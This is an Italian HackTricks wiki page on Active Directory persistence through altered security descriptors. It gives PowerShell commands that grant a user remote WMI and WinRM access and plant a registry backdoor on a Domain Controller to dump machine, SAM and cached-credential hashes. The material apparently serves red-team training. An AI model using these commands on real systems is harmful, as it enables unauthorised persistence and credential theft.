5.4 KiB
Descrittori di sicurezza
Impara l'hacking di AWS da zero a esperto con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata in HackTricks o scaricare HackTricks in PDF Controlla i PACCHETTI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di NFT esclusivi
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos di github.
Descrittori di sicurezza
Dalla documentazione: Il Linguaggio di Definizione dei Descrittori di Sicurezza (SDDL) definisce il formato utilizzato per descrivere un descrittore di sicurezza. SDDL utilizza stringhe ACE per DACL e SACL: tipo_ace;flag_ace;diritti;guid_oggetto;guid_oggetto_ereditato;sid_account;
I descrittori di sicurezza vengono utilizzati per memorizzare i permessi che un oggetto ha su un oggetto. Se riesci a fare una piccola modifica nel descrittore di sicurezza di un oggetto, puoi ottenere privilegi molto interessanti su quell'oggetto senza bisogno di essere membro di un gruppo privilegiato.
Quindi, questa tecnica di persistenza si basa sulla capacità di ottenere tutti i privilegi necessari su determinati oggetti, per poter eseguire un'operazione che di solito richiede privilegi di amministratore ma senza la necessità di essere amministratore.
Accesso a WMI
Puoi dare a un utente l'accesso per eseguire in remoto WMI utilizzando questo:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove
Accesso a WinRM
Concedere l'accesso alla console PS di winrm a un utente utilizzando questo:
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
Accesso remoto agli hash
Accedi al registro e dumpa gli hash creando un backdoor Reg utilizzando DAMP, in modo da poter recuperare in qualsiasi momento l'hash del computer, il SAM e qualsiasi credenziale AD memorizzata nella cache del computer. Pertanto, è molto utile concedere questa autorizzazione a un utente normale su un computer Domain Controller:
# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
Controlla Silver Tickets per imparare come puoi utilizzare l'hash dell'account del computer di un Domain Controller.
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata in HackTricks o scaricare HackTricks in PDF Controlla i PACCHETTI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di NFT esclusivi
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR ai repository github di HackTricks e HackTricks Cloud.